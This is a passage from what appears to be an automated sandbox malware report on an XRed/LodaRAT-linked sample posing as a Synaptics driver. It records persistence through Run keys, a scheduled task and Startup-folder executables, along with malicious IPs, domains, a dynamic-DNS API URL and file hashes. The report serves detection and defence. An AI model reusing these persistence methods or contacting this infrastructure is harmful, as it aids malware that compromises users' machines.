                                                                                                                                      • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, slscr.update.microsoft.com, onedscolprdwus22.westus.cloudapp.azure.com, otelrules.afd.azureedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, mobile.events.data.microsoft.com, ecs-office.s-0005.s-msedge.net, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, onedsblobprdeus15.eastus.cloudapp.azure.com, onedscolprdeus02.eastus.cloudapp.azure.com, officeclient.microsoft.com, prod.fs.microsoft.com.akadns.net, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, otelrules.azureedge.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, s-0005-office.config.skype.com, fe3cr.delivery.mp.microsoft.com, neu-azsc-config.officeapps.live.com, s-0005.s-msedge.net, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, azureedge-t-prod.trafficmanager.net, umwatson.events.data.microsoft
                                                                                                                                      • Execution Graph export aborted for target Synaptics.exe, PID 8060 because there are no executed function
                                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                      • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                      • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                      • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                      Simulations

                                                                                                                                      Behavior and APIs

                                                                                                                                      TimeTypeDescription
                                                                                                                                      05:48:53API Interceptor401x Sleep call for process: Synaptics.exe modified
                                                                                                                                      05:49:06API Interceptor3x Sleep call for process: WerFault.exe modified
                                                                                                                                      11:48:43AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device Driver C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      11:48:48Task SchedulerRun new task: UAINOJ.exe path: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe
                                                                                                                                      11:48:53AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run UAINOJ "C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe"
                                                                                                                                      11:49:01AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device Driver C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      11:49:09AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run UAINOJ "C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe"
                                                                                                                                      11:49:17AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe
                                                                                                                                      11:49:26AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UAINOJ.lnk
                                                                                                                                      11:49:39AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exe

                                                                                                                                      Joe Sandbox View / Context

                                                                                                                                      IPs

                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                      172.111.138.100Purchase Order Summary Details.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                        VKKDXE.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                          New PO - Supplier 16-12-2024-Pdf.exeGet hashmaliciousXRedBrowse
                                                                                                                                            Supplier.batGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                              Purchase-Order.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                test.msiGet hashmaliciousLodaRATBrowse
                                                                                                                                                  FGNEBI.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                    sdlvrr.msiGet hashmaliciousLodaRATBrowse
                                                                                                                                                      LWQDFZ.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                        JPS.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                          69.42.215.252Purchase Order Summary Details.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                          • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                                          xyxmml.msiGet hashmaliciousXRedBrowse
                                                                                                                                                          • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                                          valyzt.msiGet hashmaliciousXRedBrowse
                                                                                                                                                          • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                                          VKKDXE.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                          • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                                          New PO - Supplier 16-12-2024-Pdf.exeGet hashmaliciousXRedBrowse
                                                                                                                                                          • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                                          Supplier.batGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                          • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                                          Purchase-Order.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                          • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                                          FGNEBI.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                          • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                                          docx.msiGet hashmaliciousXRedBrowse
                                                                                                                                                          • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                                          hoaiuy.msiGet hashmaliciousXRedBrowse
                                                                                                                                                          • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978

                                                                                                                                                          Domains

                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                          filedn.com404.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 23.109.93.100
                                                                                                                                                          D0WmCTD2qO.batGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 23.109.93.100
                                                                                                                                                          c5WMpr1cOc.batGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 23.109.93.100
                                                                                                                                                          404.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 23.109.93.100
                                                                                                                                                          word.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                          • 74.120.9.25
                                                                                                                                                          964232908.emlGet hashmaliciousMeshAgentBrowse
                                                                                                                                                          • 23.109.93.100
                                                                                                                                                          http://filedn.comGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 23.109.93.100
                                                                                                                                                          Kh25PMA7u8.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 23.109.93.100
                                                                                                                                                          https://workdrive.zoho.com/file/s8yrwa67a53974b474ef79eb70d1033b872c5Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                          • 23.109.93.100
                                                                                                                                                          https://filedn.com/lt87R94Oi7NbcQdmzW2xPrR/link.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                          • 23.109.93.100
                                                                                                                                                          s-part-0017.t-0009.t-msedge.netxyxmml.msiGet hashmaliciousXRedBrowse
                                                                                                                                                          • 13.107.246.45
                                                                                                                                                          valyzt.msiGet hashmaliciousXRedBrowse
                                                                                                                                                          • 13.107.246.45
                                                                                                                                                          Purchase-Order.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                          • 13.107.246.45
                                                                                                                                                          FGNEBI.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                          • 13.107.246.45
                                                                                                                                                          sdlvrr.msiGet hashmaliciousLodaRATBrowse
                                                                                                                                                          • 13.107.246.45
                                                                                                                                                          docx.msiGet hashmaliciousXRedBrowse
                                                                                                                                                          • 13.107.246.45
                                                                                                                                                          hoaiuy.msiGet hashmaliciousXRedBrowse
                                                                                                                                                          • 13.107.246.45
                                                                                                                                                          222.msiGet hashmaliciousXRedBrowse
                                                                                                                                                          • 13.107.246.45
                                                                                                                                                          KOGJZW.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                          • 13.107.246.45
                                                                                                                                                          Machine-PO.exeGet hashmaliciousXRedBrowse
                                                                                                                                                          • 13.107.246.45
                                                                                                                                                          freedns.afraid.orgPurchase Order Summary Details.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                          • 69.42.215.252
                                                                                                                                                          xyxmml.msiGet hashmaliciousXRedBrowse
                                                                                                                                                          • 69.42.215.252
                                                                                                                                                          valyzt.msiGet hashmaliciousXRedBrowse
                                                                                                                                                          • 69.42.215.252
                                                                                                                                                          VKKDXE.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                          • 69.42.215.252
                                                                                                                                                          New PO - Supplier 16-12-2024-Pdf.exeGet hashmaliciousXRedBrowse
                                                                                                                                                          • 69.42.215.252
                                                                                                                                                          Supplier.batGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                          • 69.42.215.252
                                                                                                                                                          Purchase-Order.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                          • 69.42.215.252
                                                                                                                                                          FGNEBI.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                          • 69.42.215.252
                                                                                                                                                          docx.msiGet hashmaliciousXRedBrowse
                                                                                                                                                          • 69.42.215.252
                                                                                                                                                          hoaiuy.msiGet hashmaliciousXRedBrowse
                                                                                                                                                          • 69.42.215.252

                                                                                                                                                          ASNs

                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                          VOXILITYGBPurchase Order Summary Details.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                          • 172.111.138.100
                                                                                                                                                          VKKDXE.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                          • 172.111.138.100
                                                                                                                                                          New PO - Supplier 16-12-2024-Pdf.exeGet hashmaliciousXRedBrowse
                                                                                                                                                          • 172.111.138.100
                                                                                                                                                          Supplier.batGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                          • 172.111.138.100
                                                                                                                                                          Purchase-Order.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                          • 172.111.138.100
                                                                                                                                                          test.msiGet hashmaliciousLodaRATBrowse
                                                                                                                                                          • 172.111.138.100
                                                                                                                                                          FGNEBI.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                          • 172.111.138.100
                                                                                                                                                          sdlvrr.msiGet hashmaliciousLodaRATBrowse
                                                                                                                                                          • 172.111.138.100
                                                                                                                                                          LWQDFZ.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                          • 172.111.138.100
                                                                                                                                                          JPS.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                          • 172.111.138.100
                                                                                                                                                          SERVERS-COMUShttp://au.kirmalk.com/watch.php?vid=7750fd3c8Get hashmaliciousUnknownBrowse
                                                                                                                                                          • 23.109.135.132
                                                                                                                                                          https://specificallycries.com/askyhgxe?stixna=48&refer=https%3A%2F%2Fwww.bodyvitalspa.com%2F&kw=%5B%22welcome%22%2C%22to%22%2C%22body%22%2C%22vital%22%2C%22foot%22%2C%22spa%22%2C%22-%22%2C%22body%22%2C%22vital%22%2C%22foot%22%2C%22spa%22%5D&key=0b0f64ea0800e4174573a0e17513102f&scrWidth=1920&scrHeight=1080&tz=-5&v=24.12.6652&ship=&psid=www.bodyvitalspa.com,www.bodyvitalspa.com&sub3=invoke_layer&res=14.31&dev=r&adb=n&uuid=64597ca1-acf8-4c16-8774-db4c7f843adf%3A3%3A1&adb=nGet hashmaliciousAnonymous ProxyBrowse
                                                                                                                                                          • 172.240.108.76
                                                                                                                                                          nshmips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                          • 209.192.241.158
                                                                                                                                                          nshkarm.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                          • 185.106.143.35
                                                                                                                                                          arm5.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                          • 172.240.48.110
                                                                                                                                                          arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                          • 188.42.187.252
                                                                                                                                                          https://img10.reactor.cc/pics/post/full/Sakimichan-artist-Iono-(Pokemon)-Pok%c3%a9mon-7823638.jpegGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                          • 188.42.189.197
                                                                                                                                                          https://alluc.co/watch-movies/passengers.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 172.240.108.68
                                                                                                                                                          bxAoaISZJQ.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 23.109.170.83
                                                                                                                                                          https://nq.trikeunpured.com/iSH5pdvbnvr/kmgeLGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 173.0.146.169
                                                                                                                                                          AWKNET-LLCUSPurchase Order Summary Details.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                          • 69.42.215.252
                                                                                                                                                          xyxmml.msiGet hashmaliciousXRedBrowse
                                                                                                                                                          • 69.42.215.252
                                                                                                                                                          valyzt.msiGet hashmaliciousXRedBrowse
                                                                                                                                                          • 69.42.215.252
                                                                                                                                                          VKKDXE.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                          • 69.42.215.252
                                                                                                                                                          New PO - Supplier 16-12-2024-Pdf.exeGet hashmaliciousXRedBrowse
                                                                                                                                                          • 69.42.215.252
                                                                                                                                                          Supplier.batGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                          • 69.42.215.252
                                                                                                                                                          Purchase-Order.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                          • 69.42.215.252
                                                                                                                                                          FGNEBI.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                          • 69.42.215.252
                                                                                                                                                          docx.msiGet hashmaliciousXRedBrowse
                                                                                                                                                          • 69.42.215.252
                                                                                                                                                          hoaiuy.msiGet hashmaliciousXRedBrowse
                                                                                                                                                          • 69.42.215.252

                                                                                                                                                          JA3 Fingerprints

                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                          37f463bf4616ecd445d4a1937da06e19Purchase Order Summary Details.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                          • 142.250.185.78
                                                                                                                                                          • 142.250.185.161
                                                                                                                                                          • 23.109.93.100
                                                                                                                                                          xyxmml.msiGet hashmaliciousXRedBrowse
                                                                                                                                                          • 142.250.185.78
                                                                                                                                                          • 142.250.185.161
                                                                                                                                                          • 23.109.93.100
                                                                                                                                                          valyzt.msiGet hashmaliciousXRedBrowse
                                                                                                                                                          • 142.250.185.78
                                                                                                                                                          • 142.250.185.161
                                                                                                                                                          • 23.109.93.100
                                                                                                                                                          VKKDXE.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                          • 142.250.185.78
                                                                                                                                                          • 142.250.185.161
                                                                                                                                                          • 23.109.93.100
                                                                                                                                                          New PO - Supplier 16-12-2024-Pdf.exeGet hashmaliciousXRedBrowse
                                                                                                                                                          • 142.250.185.78
                                                                                                                                                          • 142.250.185.161
                                                                                                                                                          • 23.109.93.100
                                                                                                                                                          Supplier.batGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                          • 142.250.185.78
                                                                                                                                                          • 142.250.185.161
                                                                                                                                                          • 23.109.93.100
                                                                                                                                                          Purchase-Order.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                          • 142.250.185.78
                                                                                                                                                          • 142.250.185.161
                                                                                                                                                          • 23.109.93.100
                                                                                                                                                          FGNEBI.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                          • 142.250.185.78
                                                                                                                                                          • 142.250.185.161
                                                                                                                                                          • 23.109.93.100
                                                                                                                                                          docx.msiGet hashmaliciousXRedBrowse
                                                                                                                                                          • 142.250.185.78
                                                                                                                                                          • 142.250.185.161
                                                                                                                                                          • 23.109.93.100
                                                                                                                                                          hoaiuy.msiGet hashmaliciousXRedBrowse
                                                                                                                                                          • 142.250.185.78
                                                                                                                                                          • 142.250.185.161
                                                                                                                                                          • 23.109.93.100

                                                                                                                                                          Dropped Files

                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                          C:\ProgramData\Synaptics\RCX4FAD.tmpvalyzt.msiGet hashmaliciousXRedBrowse
                                                                                                                                                            New PO - Supplier 16-12-2024-Pdf.exeGet hashmaliciousXRedBrowse
                                                                                                                                                              Purchase-Order.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                                hoaiuy.msiGet hashmaliciousXRedBrowse
                                                                                                                                                                  222.msiGet hashmaliciousXRedBrowse
                                                                                                                                                                    Machine-PO.exeGet hashmaliciousXRedBrowse
                                                                                                                                                                      222.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                                        C:\ProgramData\Synaptics\Synaptics.exeMachine-PO.exeGet hashmaliciousXRedBrowse

                                                                                                                                                                          Created / dropped Files

                                                                                                                                                                          C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\OFFICE\Heartbeat\HeartbeatCache.xml

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):118
                                                                                                                                                                          Entropy (8bit):3.5700810731231707
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
                                                                                                                                                                          MD5:573220372DA4ED487441611079B623CD
                                                                                                                                                                          SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
                                                                                                                                                                          SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
                                                                                                                                                                          SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.

                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Synaptics.exe_3323f08b4d67f24a49dcac47a8ac8f69775d6939_455b7b6e_047fb973-4fb7-40bd-9c76-a748ea6e3150\Report.wer

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):65536
                                                                                                                                                                          Entropy (8bit):1.1286677841855057
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:192:45iHVpsvI4b0BU/3DzJDzqjUz4B9lyQwzuiFjZ24IO8EKDzy:CWyvXoBU/3Jqjp+zuiFjY4IO8zy
                                                                                                                                                                          MD5:1289594D6B36003DCB6CB35061D3EC46
                                                                                                                                                                          SHA1:96DBFB3A656FA089DDCF089653A948CBB5C800DB
                                                                                                                                                                          SHA-256:DE4A37C508A96B9CCB60F9095A0FDDD167D58BA144526979BA89DFCAC18807EE
                                                                                                                                                                          SHA-512:D5B61C90C56F32AB98CCD85098F4F3AAF9C4889561DF587E4D616A9199656E9AA4D9F461ECB2AC7D4FB0B07C61B9CA1D65519A5E9AC80C7230FB7708EF672477
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.0.2.9.3.8.9.2.4.7.3.2.8.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.0.2.9.3.9.5.1.5.3.5.8.1.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.4.7.f.b.9.7.3.-.4.f.b.7.-.4.0.b.d.-.9.c.7.6.-.a.7.4.8.e.a.6.e.3.1.5.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.e.8.8.6.3.0.3.-.f.0.0.d.-.4.0.7.b.-.b.6.b.6.-.3.1.2.1.e.f.1.b.b.3.2.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.y.n.a.p.t.i.c.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.e.3.4.-.0.0.0.1.-.0.0.1.4.-.6.e.9.2.-.b.5.7.4.a.8.5.a.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.9.9.a.1.3.7.d.5.9.3.d.d.a.9.d.1.5.8.d.c.8.b.6.b.7.7.2.0.d.e.b.0.0.0.0.1.f.0.4.!.0.0.0.0.6.c.2.b.a.a.7.2.e.a.5.d.0.8.b.6.5.8.3.8.9.3.b.0.1.0.0.1.e.5.4.0.2.1.3.f.4.a.a.f.!.S.y.n.a.p.t.i.c.s...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.

                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Synaptics.exe_e73781c637c020daee3de6ae263d2d0a91f2a4c_455b7b6e_de702fc2-62c7-4b06-b7fc-844383975172\Report.wer

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):65536
                                                                                                                                                                          Entropy (8bit):1.1337945178120208
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:192:7ifitVpsLI40vvNekLDzJDzqjLOAPV0dsJzuiF+Z24IO8EKDzy:GfUyLWvvNekLJqj8CzuiF+Y4IO8zy
                                                                                                                                                                          MD5:067282B20315DC390D5B37F6FBF92EF9
                                                                                                                                                                          SHA1:8A3CAA41608CEE5EDF503C91C35F0864993814B9
                                                                                                                                                                          SHA-256:19253979AB9E62CDE61912561651A7D4DF8650649B53AA83D15B770569A3BE80
                                                                                                                                                                          SHA-512:6BB60E4A6A2E9B2BC15D6CE6DAB5F7F77536F1F5DE325D80D1507C9966978443952C163ABA37382D342134B381B95A3184E9A82EF9C051F1AEB5952E1382DE9C
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.0.2.9.3.3.9.1.8.5.0.0.7.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.0.2.9.3.4.4.4.3.5.0.3.0.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.e.7.0.2.f.c.2.-.6.2.c.7.-.4.b.0.6.-.b.7.f.c.-.8.4.4.3.8.3.9.7.5.1.7.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.0.4.f.b.0.5.d.-.8.6.4.2.-.4.9.a.6.-.8.6.4.e.-.f.2.7.6.d.7.2.9.1.4.f.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.y.n.a.p.t.i.c.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.f.7.c.-.0.0.0.1.-.0.0.1.4.-.3.e.d.3.-.7.c.6.5.a.8.5.a.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.9.9.a.1.3.7.d.5.9.3.d.d.a.9.d.1.5.8.d.c.8.b.6.b.7.7.2.0.d.e.b.0.0.0.0.1.f.0.4.!.0.0.0.0.6.c.2.b.a.a.7.2.e.a.5.d.0.8.b.6.5.8.3.8.9.3.b.0.1.0.0.1.e.5.4.0.2.1.3.f.4.a.a.f.!.S.y.n.a.p.t.i.c.s...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.

                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Synaptics.exe_e73781c637c020daee3de6ae263d2d0a91f2a4c_455b7b6e_fa8646df-fa1c-4057-9b6a-24fb6afc6947\Report.wer

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):65536
                                                                                                                                                                          Entropy (8bit):1.1337165992886953
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:192:E0ftVpsII40WbkODzJDzqjLOAPV0dsJzuiF+Z24IO8EKDzy:9yIWWbkOJqj8CzuiF+Y4IO8zy
                                                                                                                                                                          MD5:27B156E1786606D1F439C7CD7F00F96F
                                                                                                                                                                          SHA1:B8EA2EC046B47130CCFA19D68AAF6BAE87E10530
                                                                                                                                                                          SHA-256:9CE604F42D8E357CDBDA9E43C73C622C72EA1DCA3A999FA59216124D8CE19886
                                                                                                                                                                          SHA-512:D0F313CB52365FB51E5BB0E6C78FDC13A9C93D092F0CDBD187AE06EC6BAE03600301693B2F52972089372B2FADCB6575E4CABEDE37801F0E358B0D66AB8F9DCB
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.0.2.9.3.4.7.0.2.1.9.8.9.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.0.2.9.3.4.7.7.0.9.4.9.6.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.a.8.6.4.6.d.f.-.f.a.1.c.-.4.0.5.7.-.9.b.6.a.-.2.4.f.b.6.a.f.c.6.9.4.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.8.0.8.7.9.6.6.-.9.e.1.f.-.4.7.0.4.-.9.0.6.5.-.e.7.4.b.4.a.b.9.2.8.c.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.y.n.a.p.t.i.c.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.f.7.c.-.0.0.0.1.-.0.0.1.4.-.3.e.d.3.-.7.c.6.5.a.8.5.a.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.9.9.a.1.3.7.d.5.9.3.d.d.a.9.d.1.5.8.d.c.8.b.6.b.7.7.2.0.d.e.b.0.0.0.0.1.f.0.4.!.0.0.0.0.6.c.2.b.a.a.7.2.e.a.5.d.0.8.b.6.5.8.3.8.9.3.b.0.1.0.0.1.e.5.4.0.2.1.3.f.4.a.a.f.!.S.y.n.a.p.t.i.c.s...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.

                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER5361.tmp.dmp

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          File Type:Mini DuMP crash report, 14 streams, Mon Dec 30 10:49:50 2024, 0x1205a4 type
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):3073914
                                                                                                                                                                          Entropy (8bit):2.3274723373890502
                                                                                                                                                                          Encrypted:false
